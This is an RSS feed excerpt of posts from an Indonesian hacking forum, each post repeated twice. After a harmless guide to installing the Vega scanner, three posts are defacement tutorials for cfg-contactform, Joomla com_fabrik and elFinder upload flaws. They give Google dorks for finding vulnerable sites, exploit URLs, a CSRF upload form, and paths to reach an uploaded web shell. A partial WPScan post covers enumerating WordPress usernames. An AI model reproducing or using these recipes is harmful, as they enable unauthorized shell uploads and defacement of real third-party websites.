<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size">" Cintailah Pasanganmu sekedarnya saja jika pada akhirnya bukan dia yang nantinya menemani hidupmu untuk selamanya "</span></span></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How to install Vulnerability Scanner Vega on Backbox]]></title>
			<link>https://www.backboxindonesia.or.id/thread-150.html</link>
			<pubDate>Wed, 20 Jul 2016 15:08:05 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-150.html</guid>
			<description><![CDATA[Setelah melalui banyak rintangan yang dihadapin di dunia open source ini kali ini saya akan share bagaimana cara instalasi Vulnerability Scanner Vega di Backbox tanpa banyak cekcok kita langsung eksekusi !!<br />
<br />
Pertama-tama anda harus download terlebih dahulu toolsnya di <a href="https://subgraph.com/vega/download/" target="_blank" class="mycode_url">https://subgraph.com/vega/download/</a> supaya lebih mudah saya buatkan command linenya seperti di bawah ini<br />
<br />
Untuk versi 32bit<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; wget https://dist.subgraph.com/downloads/VegaBuild-linux.gtk.x86.zip<br />
&#36; unzip VegaBuild-linux.gtk.x86.zip</code></div></div><br />
Untuk versi 64bit<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; wget https://dist.subgraph.com/downloads/VegaBuild-linux.gtk.x86_64.zip<br />
&#36; unzip VegaBuild-linux.gtk.x86_64.zip</code></div></div><br />
Tunggu beberapa menit setelah itu anda masukan command berikut :<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; cd vega<br />
&#36; ./Vega</code></div></div><br />
Nah tools Vulnerability Scanner Vega sudah berada di BackBox anda<br />
<br />
Maaf jika postingan ini belum sempurna karena manusia tiada yang sempurna begitu juga system yan diciptakannya <span style="font-weight: bold;" class="mycode_b">So keep learn Attack and Defence</span><br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size">" Cintailah Pasanganmu sekedarnya saja jika pada akhirnya bukan dia yang nantinya menemani hidupmu untuk selamanya "</span></span></blockquote>
]]></description>
			<content:encoded><![CDATA[Setelah melalui banyak rintangan yang dihadapin di dunia open source ini kali ini saya akan share bagaimana cara instalasi Vulnerability Scanner Vega di Backbox tanpa banyak cekcok kita langsung eksekusi !!<br />
<br />
Pertama-tama anda harus download terlebih dahulu toolsnya di <a href="https://subgraph.com/vega/download/" target="_blank" class="mycode_url">https://subgraph.com/vega/download/</a> supaya lebih mudah saya buatkan command linenya seperti di bawah ini<br />
<br />
Untuk versi 32bit<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; wget https://dist.subgraph.com/downloads/VegaBuild-linux.gtk.x86.zip<br />
&#36; unzip VegaBuild-linux.gtk.x86.zip</code></div></div><br />
Untuk versi 64bit<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; wget https://dist.subgraph.com/downloads/VegaBuild-linux.gtk.x86_64.zip<br />
&#36; unzip VegaBuild-linux.gtk.x86_64.zip</code></div></div><br />
Tunggu beberapa menit setelah itu anda masukan command berikut :<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; cd vega<br />
&#36; ./Vega</code></div></div><br />
Nah tools Vulnerability Scanner Vega sudah berada di BackBox anda<br />
<br />
Maaf jika postingan ini belum sempurna karena manusia tiada yang sempurna begitu juga system yan diciptakannya <span style="font-weight: bold;" class="mycode_b">So keep learn Attack and Defence</span><br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size">" Cintailah Pasanganmu sekedarnya saja jika pada akhirnya bukan dia yang nantinya menemani hidupmu untuk selamanya "</span></span></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[cfg-contactform Vulnerability File Upload]]></title>
			<link>https://www.backboxindonesia.or.id/thread-133.html</link>
			<pubDate>Fri, 27 May 2016 12:02:58 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-133.html</guid>
			<description><![CDATA[iseng2 share exploit lawas, kali aja masih crootz.<br />
btw sekalian nyicip Shell <a href="http://www.backboxindonesia.or.id/thread-132.html" target="_blank" class="mycode_url">BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL)</a> dari Kang hightech.<br />
<br />
langsung ja, Play with me Baby  :heart: <br />
<br />
Dork:<br />
"/cfg-contactform-1/" <br />
"/cfg-contactform-2/"<br />
<br />
# Disini exploitnya tergantung contact form yg keberapa mas bro,<br />
/[path]/cfg-contactform-1/inc/upload.php<br />
<br />
Vuln? {"filename":" -001."} *trgantung dork sih<br />
<br />
<img src="http://image.prntscr.com/image/7b43e7787e784a25a581c140acc7a1dd.png" alt="[Image: 7b43e7787e784a25a581c140acc7a1dd.png]" class="mycode_img" /><br />
<br />
<span style="font-weight: bold;" class="mycode_b">CSRF Upload:</span><br />
&lt;form enctype="multipart/form-data"<br />
action="target" method="post"&gt;<br />
&lt;input type="text" name="folder" value="./" /&gt;&lt;br /&gt;<br />
Please choose a file: &lt;input name="Filedata" type="file" /&gt;&lt;br /&gt;<br />
&lt;input type="submit" value="upload" /&gt;<br />
&lt;/form&gt;<br />
<br />
lalu tinggal upload file/shell ente.<br />
kalo berhasil muncul nama shell ente<br />
<br />
<img src="http://image.prntscr.com/image/8f90e2f76d0b402fa904af6623ff68fa.png" alt="[Image: 8f90e2f76d0b402fa904af6623ff68fa.png]" class="mycode_img" /><br />
<br />
Shell Akses:/[path]/cfg-contactform-1/upload/namashell.php<br />
<br />
<img src="http://image.prntscr.com/image/50ec314b0dc94aef8937f16135eca205.png" alt="[Image: 50ec314b0dc94aef8937f16135eca205.png]" class="mycode_img" /><br />
<br />
untuk code PHP <a href="http://pastebin.com/isWCAt5g" target="_blank" class="mycode_url"><span style="color: #ff3399;" class="mycode_color">disini</span></a> <br />
<br />
Semoga bermanfaat gengs, maap kalo tutor cupu  :D <br />
jgn lupa kunjungin Blog ane juga yak wkkww : <a href="http://tkjcyberart.blogspot.co.id/" target="_blank" class="mycode_url"><span style="color: #33cc33;" class="mycode_color">TKJ Cyber Art</span></a><br />
<br />
~ Bye<br />
<br />
<br />
<a href="http://haurgeulis-security.blogspot.co.id/2015/01/deface-cfg-contactform-vulnerability.html" target="_blank" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">SUMUR</span></a>]]></description>
			<content:encoded><![CDATA[iseng2 share exploit lawas, kali aja masih crootz.<br />
btw sekalian nyicip Shell <a href="http://www.backboxindonesia.or.id/thread-132.html" target="_blank" class="mycode_url">BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL)</a> dari Kang hightech.<br />
<br />
langsung ja, Play with me Baby  :heart: <br />
<br />
Dork:<br />
"/cfg-contactform-1/" <br />
"/cfg-contactform-2/"<br />
<br />
# Disini exploitnya tergantung contact form yg keberapa mas bro,<br />
/[path]/cfg-contactform-1/inc/upload.php<br />
<br />
Vuln? {"filename":" -001."} *trgantung dork sih<br />
<br />
<img src="http://image.prntscr.com/image/7b43e7787e784a25a581c140acc7a1dd.png" alt="[Image: 7b43e7787e784a25a581c140acc7a1dd.png]" class="mycode_img" /><br />
<br />
<span style="font-weight: bold;" class="mycode_b">CSRF Upload:</span><br />
&lt;form enctype="multipart/form-data"<br />
action="target" method="post"&gt;<br />
&lt;input type="text" name="folder" value="./" /&gt;&lt;br /&gt;<br />
Please choose a file: &lt;input name="Filedata" type="file" /&gt;&lt;br /&gt;<br />
&lt;input type="submit" value="upload" /&gt;<br />
&lt;/form&gt;<br />
<br />
lalu tinggal upload file/shell ente.<br />
kalo berhasil muncul nama shell ente<br />
<br />
<img src="http://image.prntscr.com/image/8f90e2f76d0b402fa904af6623ff68fa.png" alt="[Image: 8f90e2f76d0b402fa904af6623ff68fa.png]" class="mycode_img" /><br />
<br />
Shell Akses:/[path]/cfg-contactform-1/upload/namashell.php<br />
<br />
<img src="http://image.prntscr.com/image/50ec314b0dc94aef8937f16135eca205.png" alt="[Image: 50ec314b0dc94aef8937f16135eca205.png]" class="mycode_img" /><br />
<br />
untuk code PHP <a href="http://pastebin.com/isWCAt5g" target="_blank" class="mycode_url"><span style="color: #ff3399;" class="mycode_color">disini</span></a> <br />
<br />
Semoga bermanfaat gengs, maap kalo tutor cupu  :D <br />
jgn lupa kunjungin Blog ane juga yak wkkww : <a href="http://tkjcyberart.blogspot.co.id/" target="_blank" class="mycode_url"><span style="color: #33cc33;" class="mycode_color">TKJ Cyber Art</span></a><br />
<br />
~ Bye<br />
<br />
<br />
<a href="http://haurgeulis-security.blogspot.co.id/2015/01/deface-cfg-contactform-vulnerability.html" target="_blank" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">SUMUR</span></a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[eXploit Com_Fabrik]]></title>
			<link>https://www.backboxindonesia.or.id/thread-131.html</link>
			<pubDate>Mon, 23 May 2016 03:56:57 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-131.html</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://1.bp.blogspot.com/-SlQEIGwywP0/Vx8cSITah2I/AAAAAAAAAs4/DVuJ3CGJ2u0-Lyb9Czj5PfvBKuLhFe5iACKgB/s320/bug.jpg" alt="[Image: bug.jpg]" class="mycode_img" /></div>
<span style="color: #333333;" class="mycode_color">hehehe, pagi Gengs, iseng2 buka folder lawas, eh nemu file isinya webtarget, pas di coba eh ada salah satu yg masih vuln exploit Com_Fabrik nih. haha yowes gua bikin bahan utk tutorial artikel diPorum ini aja. Berharap ada agan yg bisa ngembangin Dork Freshnya, dan Teknik ini bisa mengemparkan dunia persilatan di Jones-H lagi akwkwak &gt;.&lt;" . *curhatan mengenang masalalu :'D</span><br />
<br />
yg dah Master Minggir dlu Bebz :heart: <br />
<br />
Dork:<br />
inurl:index.php?option=com_fabrik<br />
inurl:index.php/component/fabrik/ site:<br />
inurl:index.php?option=com_fabrik&amp;view= site:<br />
inurl:importcsv.php site:<br />
inurl:viewTable?cid= site:com<br />
<br />
Exploit: <br />
/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;table=1<br />
or<br />
/index.php?option=com_fabrik&amp;amp;c=import&amp;amp;view=import&amp;amp;filetype=csv&amp;amp;tableid=1echercher <br />
<br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Helvetica, sans-serif;" class="mycode_font">dan kebetulan ditarget Nue kali ini, Exploitnya terletak di:</span></span></span><br />
<span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Helvetica, sans-serif;" class="mycode_font"><span style="color: #222222;" class="mycode_color">target.coli</span><span style="color: #ff3333;" class="mycode_color">/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;table=1</span></span></span><br />
<br />
<img src="http://img.prntscr.com/img?url=http://i.imgur.com/etBWWqA.png" alt="[Image: etBWWqA.png]" class="mycode_img" /><br />
<br />
Tuh tinggal Upload Shell/File agan saja  :D <br />
Lalu Klik Import CSV<br />
<br />
Shell/File Akses o.O ?? <span style="color: #ff3333;" class="mycode_color">/media/namashell</span><br />
cth: <span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">target.coli</span></span></span><span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">/media/nueenggakpernah.php</span></span></span><br />
<br />
<img src="http://img.prntscr.com/img?url=http://i.imgur.com/vIHqkld.png" alt="[Image: vIHqkld.png]" class="mycode_img" /><br />
<br />
Yuk yang regional Jakarta Join Grup FB: <a href="https://www.facebook.com/groups/BackBoxJakartaTeam/" target="_blank" class="mycode_url"><span style="color: #ff33cc;" class="mycode_color">BackBox Jakarta Team</span></a><br />
<br />
xixihi kunjungin Blog ane juga yak  :rolleyes: <span style="color: #33cc99;" class="mycode_color"><a href="http://tkjcyberart.blogspot.co.id/2016/05/deface-dengan-exploit-comfabrik.html" target="_blank" class="mycode_url"><span style="color: #33cc99;" class="mycode_color">TKJ Cyber Art</span></a> </span><br />
<br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="font-family: Roboto, sans-serif;" class="mycode_font">semoga bermanfaat Gengs, maap kalo post cupu  </span><img src="http://www.backboxindonesia.or.id/images/smilies/smile.png" alt="[Image: smile.png]" class="mycode_img" /><span style="font-family: Roboto, sans-serif;" class="mycode_font"> </span><br />
<span style="font-family: Roboto, sans-serif;" class="mycode_font">waktunya Nue dan tim Katakan Putus cabut dulu gengs,   <img src="http://www.backboxindonesia.or.id/images/smilies/cool.png" width="21" height="21" alt="[Image: cool.png]" class="mycode_img" /> </span></span></span><br />
<br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">Bye~</span></span><br />
<br />
<br />
<a href="http://indocyberarmy.blogspot.co.id/2013/03/deface-dengan-exploit-joomla-comfabric.html" target="_blank" class="mycode_url"><span style="color: #ff3399;" class="mycode_color">SUMUR</span></a>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://1.bp.blogspot.com/-SlQEIGwywP0/Vx8cSITah2I/AAAAAAAAAs4/DVuJ3CGJ2u0-Lyb9Czj5PfvBKuLhFe5iACKgB/s320/bug.jpg" alt="[Image: bug.jpg]" class="mycode_img" /></div>
<span style="color: #333333;" class="mycode_color">hehehe, pagi Gengs, iseng2 buka folder lawas, eh nemu file isinya webtarget, pas di coba eh ada salah satu yg masih vuln exploit Com_Fabrik nih. haha yowes gua bikin bahan utk tutorial artikel diPorum ini aja. Berharap ada agan yg bisa ngembangin Dork Freshnya, dan Teknik ini bisa mengemparkan dunia persilatan di Jones-H lagi akwkwak &gt;.&lt;" . *curhatan mengenang masalalu :'D</span><br />
<br />
yg dah Master Minggir dlu Bebz :heart: <br />
<br />
Dork:<br />
inurl:index.php?option=com_fabrik<br />
inurl:index.php/component/fabrik/ site:<br />
inurl:index.php?option=com_fabrik&amp;view= site:<br />
inurl:importcsv.php site:<br />
inurl:viewTable?cid= site:com<br />
<br />
Exploit: <br />
/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;table=1<br />
or<br />
/index.php?option=com_fabrik&amp;amp;c=import&amp;amp;view=import&amp;amp;filetype=csv&amp;amp;tableid=1echercher <br />
<br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Helvetica, sans-serif;" class="mycode_font">dan kebetulan ditarget Nue kali ini, Exploitnya terletak di:</span></span></span><br />
<span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Helvetica, sans-serif;" class="mycode_font"><span style="color: #222222;" class="mycode_color">target.coli</span><span style="color: #ff3333;" class="mycode_color">/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;table=1</span></span></span><br />
<br />
<img src="http://img.prntscr.com/img?url=http://i.imgur.com/etBWWqA.png" alt="[Image: etBWWqA.png]" class="mycode_img" /><br />
<br />
Tuh tinggal Upload Shell/File agan saja  :D <br />
Lalu Klik Import CSV<br />
<br />
Shell/File Akses o.O ?? <span style="color: #ff3333;" class="mycode_color">/media/namashell</span><br />
cth: <span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">target.coli</span></span></span><span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">/media/nueenggakpernah.php</span></span></span><br />
<br />
<img src="http://img.prntscr.com/img?url=http://i.imgur.com/vIHqkld.png" alt="[Image: vIHqkld.png]" class="mycode_img" /><br />
<br />
Yuk yang regional Jakarta Join Grup FB: <a href="https://www.facebook.com/groups/BackBoxJakartaTeam/" target="_blank" class="mycode_url"><span style="color: #ff33cc;" class="mycode_color">BackBox Jakarta Team</span></a><br />
<br />
xixihi kunjungin Blog ane juga yak  :rolleyes: <span style="color: #33cc99;" class="mycode_color"><a href="http://tkjcyberart.blogspot.co.id/2016/05/deface-dengan-exploit-comfabrik.html" target="_blank" class="mycode_url"><span style="color: #33cc99;" class="mycode_color">TKJ Cyber Art</span></a> </span><br />
<br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="font-family: Roboto, sans-serif;" class="mycode_font">semoga bermanfaat Gengs, maap kalo post cupu  </span><img src="http://www.backboxindonesia.or.id/images/smilies/smile.png" alt="[Image: smile.png]" class="mycode_img" /><span style="font-family: Roboto, sans-serif;" class="mycode_font"> </span><br />
<span style="font-family: Roboto, sans-serif;" class="mycode_font">waktunya Nue dan tim Katakan Putus cabut dulu gengs,   <img src="http://www.backboxindonesia.or.id/images/smilies/cool.png" width="21" height="21" alt="[Image: cool.png]" class="mycode_img" /> </span></span></span><br />
<br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">Bye~</span></span><br />
<br />
<br />
<a href="http://indocyberarmy.blogspot.co.id/2013/03/deface-dengan-exploit-joomla-comfabric.html" target="_blank" class="mycode_url"><span style="color: #ff3399;" class="mycode_color">SUMUR</span></a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[eXploit elFinder Shell Upload Vulnerability]]></title>
			<link>https://www.backboxindonesia.or.id/thread-117.html</link>
			<pubDate>Mon, 02 May 2016 15:22:49 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-117.html</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://1.bp.blogspot.com/-SlQEIGwywP0/Vx8cSITah2I/AAAAAAAAAs4/DVuJ3CGJ2u0-Lyb9Czj5PfvBKuLhFe5iACKgB/s320/bug.jpg" alt="[Image: bug.jpg]" class="mycode_img" /></div>
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">xixixhi Malam gengs, sorry kalo tutorial cupu hihi #cumasharekok</span></span><br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">*nyari Bug mulu, nyari pacarnya kapan* xD</span></span><br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff3366;" class="mycode_color">iseng2 share exploit lama, kali aja masih crotz awkakw</span></span></span></span><span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">.</span></span><br />
<br />
untuk Tutorial Auto exploiter elFinder nya bisa cek dimari -&gt; <a href="http://blog.indoxploit.or.id/2016/02/auto-exploiter-elfinder.html" target="_blank" class="mycode_url"><span style="color: #ff66cc;" class="mycode_color">Auto Exploiter elFinder</span></a><br />
<br />
yg dah master minggir dlu beb  :heart: <br />
<br />
DORK:<br />
inurl:/elfinder/elfinder.php.html<br />
inurl:/elfinder/files/<br />
<br />
Exploit:<br />
<a href="http://site.com/" target="_blank" class="mycode_url">http://site.com/</a>[path]/elfinder/elfinder.html <br />
<a href="http://site.com/" target="_blank" class="mycode_url">http://site.com/</a>[path]/elfinder/elfinder.php.html                  <br />
<a href="http://site.com/" target="_blank" class="mycode_url">http://site.com/</a>[path]/elfinder/src/elfinder-src.php.html<br />
<br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Helvetica, sans-serif;" class="mycode_font">dan kebetulan ditarget Nue kali ini, Exploitnya terletak di:</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Helvetica, sans-serif;" class="mycode_font">www.target.com<span style="color: red;" class="mycode_color">/elfinder/elfinder.html</span></span></span></span><br />
<br />
<img src="http://i.imgur.com/CGfmmii.png" alt="[Image: CGfmmii.png]" class="mycode_img" /><br />
<br />
Tuh tinggal Upload File/Shell Lo aja :D<br />
<br />
Shell Akses o.O ??<br />
klik kanan di file yg telah di upload, lalu klik get info/klik yang paling bawah<br />
Lalu Klik Deh nama shell agans :3<br />
<br />
<img src="http://i.imgur.com/PtS4XpS.png" alt="[Image: PtS4XpS.png]" class="mycode_img" /><br />
<br />
Atau langsung ke site nya:<br />
<br />
<a href="http://target.co.li/" target="_blank" class="mycode_url">http://target.co.li/</a>[path]/elfinder/files/shellkamu.php<br />
<br />
<img src="http://i.imgur.com/Y6cKOyB.png" alt="[Image: Y6cKOyB.png]" class="mycode_img" /><br />
<br />
Yuk yang regional Jakarta Join Grup FB:<br />
<a href="https://www.facebook.com/groups/BackBoxJakartaTeam/" target="_blank" class="mycode_url"><span style="color: #ff3399;" class="mycode_color">Jakarta BackBox Team</span></a><br />
<br />
<br />
xixihi kunjungin Blog ane juga yak  :rolleyes: <a href="http://tkjcyberart.blogspot.co.id/2016/02/tutorial-deface-elfinder-shell-upload.html" target="_blank" class="mycode_url"><span style="color: #ff3366;" class="mycode_color">TKJ Cyber Art</span></a><br />
<br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="font-family: Roboto, sans-serif;" class="mycode_font">semoga bermanfaat Gengs, maap kalo post cupu  </span><img src="http://www.backboxindonesia.or.id/images/smilies/smile.png" alt="[Image: smile.png]" class="mycode_img" /><span style="font-family: Roboto, sans-serif;" class="mycode_font"> </span><br />
<span style="font-family: Roboto, sans-serif;" class="mycode_font">waktunya Nue dan tim Katakan Putus cabut dulu gengs,   <img src="http://www.backboxindonesia.or.id/images/smilies/cool.png" width="21" height="21" alt="[Image: cool.png]" class="mycode_img" /> </span></span></span><br />
<br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">Bye~</span></span><br />
<br />
<a href="http://unitedcyberspaceofindonesia.blogspot.co.id/2014/05/cara-deface-dengan-elfinder.html" target="_blank" class="mycode_url"><span style="color: #cc3333;" class="mycode_color">SUMUR</span></a>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://1.bp.blogspot.com/-SlQEIGwywP0/Vx8cSITah2I/AAAAAAAAAs4/DVuJ3CGJ2u0-Lyb9Czj5PfvBKuLhFe5iACKgB/s320/bug.jpg" alt="[Image: bug.jpg]" class="mycode_img" /></div>
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">xixixhi Malam gengs, sorry kalo tutorial cupu hihi #cumasharekok</span></span><br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">*nyari Bug mulu, nyari pacarnya kapan* xD</span></span><br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff3366;" class="mycode_color">iseng2 share exploit lama, kali aja masih crotz awkakw</span></span></span></span><span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">.</span></span><br />
<br />
untuk Tutorial Auto exploiter elFinder nya bisa cek dimari -&gt; <a href="http://blog.indoxploit.or.id/2016/02/auto-exploiter-elfinder.html" target="_blank" class="mycode_url"><span style="color: #ff66cc;" class="mycode_color">Auto Exploiter elFinder</span></a><br />
<br />
yg dah master minggir dlu beb  :heart: <br />
<br />
DORK:<br />
inurl:/elfinder/elfinder.php.html<br />
inurl:/elfinder/files/<br />
<br />
Exploit:<br />
<a href="http://site.com/" target="_blank" class="mycode_url">http://site.com/</a>[path]/elfinder/elfinder.html <br />
<a href="http://site.com/" target="_blank" class="mycode_url">http://site.com/</a>[path]/elfinder/elfinder.php.html                  <br />
<a href="http://site.com/" target="_blank" class="mycode_url">http://site.com/</a>[path]/elfinder/src/elfinder-src.php.html<br />
<br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Helvetica, sans-serif;" class="mycode_font">dan kebetulan ditarget Nue kali ini, Exploitnya terletak di:</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Helvetica, sans-serif;" class="mycode_font">www.target.com<span style="color: red;" class="mycode_color">/elfinder/elfinder.html</span></span></span></span><br />
<br />
<img src="http://i.imgur.com/CGfmmii.png" alt="[Image: CGfmmii.png]" class="mycode_img" /><br />
<br />
Tuh tinggal Upload File/Shell Lo aja :D<br />
<br />
Shell Akses o.O ??<br />
klik kanan di file yg telah di upload, lalu klik get info/klik yang paling bawah<br />
Lalu Klik Deh nama shell agans :3<br />
<br />
<img src="http://i.imgur.com/PtS4XpS.png" alt="[Image: PtS4XpS.png]" class="mycode_img" /><br />
<br />
Atau langsung ke site nya:<br />
<br />
<a href="http://target.co.li/" target="_blank" class="mycode_url">http://target.co.li/</a>[path]/elfinder/files/shellkamu.php<br />
<br />
<img src="http://i.imgur.com/Y6cKOyB.png" alt="[Image: Y6cKOyB.png]" class="mycode_img" /><br />
<br />
Yuk yang regional Jakarta Join Grup FB:<br />
<a href="https://www.facebook.com/groups/BackBoxJakartaTeam/" target="_blank" class="mycode_url"><span style="color: #ff3399;" class="mycode_color">Jakarta BackBox Team</span></a><br />
<br />
<br />
xixihi kunjungin Blog ane juga yak  :rolleyes: <a href="http://tkjcyberart.blogspot.co.id/2016/02/tutorial-deface-elfinder-shell-upload.html" target="_blank" class="mycode_url"><span style="color: #ff3366;" class="mycode_color">TKJ Cyber Art</span></a><br />
<br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="font-family: Roboto, sans-serif;" class="mycode_font">semoga bermanfaat Gengs, maap kalo post cupu  </span><img src="http://www.backboxindonesia.or.id/images/smilies/smile.png" alt="[Image: smile.png]" class="mycode_img" /><span style="font-family: Roboto, sans-serif;" class="mycode_font"> </span><br />
<span style="font-family: Roboto, sans-serif;" class="mycode_font">waktunya Nue dan tim Katakan Putus cabut dulu gengs,   <img src="http://www.backboxindonesia.or.id/images/smilies/cool.png" width="21" height="21" alt="[Image: cool.png]" class="mycode_img" /> </span></span></span><br />
<br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">Bye~</span></span><br />
<br />
<a href="http://unitedcyberspaceofindonesia.blogspot.co.id/2014/05/cara-deface-dengan-elfinder.html" target="_blank" class="mycode_url"><span style="color: #cc3333;" class="mycode_color">SUMUR</span></a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cara mendapatkan Username Website berBasis CMS WordPress dengan WPScan]]></title>
			<link>https://www.backboxindonesia.or.id/thread-115.html</link>
			<pubDate>Sat, 30 Apr 2016 14:38:52 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-115.html</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://lh3.googleusercontent.com/-P-nPxSVr2UM/VxxHz_ZT7TI/AAAAAAAAAqM/YTUB6Sddb_Qctm1SH30ymhdWF6egAGxhQ/w426-h254/linus.jpg" alt="[Image: linus.jpg]" class="mycode_img" /></div>
xixixhi, happy sadnight mblo :v akwkwa<br />
udh ramein porum aje awkkwa, moga thread garing ini bermanfaat bebz  :heart: <br />
<span style="color: #333333;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">WPScan ini di gunakan untuk mengetahui username pada CMS Wordpress dan juga bisa mengetahui Password, namun jika ingin mengetahui passwordnya harus mempunyai wordlist nya.</span></span></span><br />
<br />
<span style="color: #333333;" class="mycode_color">langsung aja deh</span><br />
<br />
Pertama" buka Terminal dan ketik kan<br />
<br />
<span style="color: #ff3366;" class="mycode_color">wpscan -u (target) --enumerate u</span><br />
<br />
<div style="text-align: left;" class="mycode_align"><img src="https://scontent-sin1-1.xx.fbcdn.net/v/t35.0-12/13120487_784689834998705_1965889797_o.png?oh=9cee7f8eb92d85b7e6776fab924091c9&amp;oe=5729B542" alt="[Image: 13120487_784689834998705_1965889797_o.pn...e=5729B542]" class="mycode_img" /></div>
<br />
NB: pada --enumerate u , Huruf "U" itu berarti Username, Jika untuk mencari Password ganti aja dengan Huruf "P".<br />
<br />
Selanjutnya tunggu hingga scanning nya selesai.<br />
<br />
<img src="https://scontent-sin1-1.xx.fbcdn.net/v/t35.0-12/13052536_784689831665372_1432977301_o.png?oh=9e35ce918a2acfd4360a0d6124216575&amp;oe=572981AC" alt="[Image: 13052536_784689831665372_1432977301_o.pn...e=572981AC]" class="mycode_img" /><br />
<br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">Jika Sudah selesai akan muncul seperti ini.</span></span></span><br />
<br />
<img src="https://scontent-sin1-1.xx.fbcdn.net/hphotos-xap1/v/t35.0-12/13091751_784689844998704_388074066_o.png?oh=ebabbe56b35d4104a123c5d039dc5f04&amp;oe=57299EE9" alt="[Image: 13091751_784689844998704_388074066_o.png...e=57299EE9]" class="mycode_img" /><br />
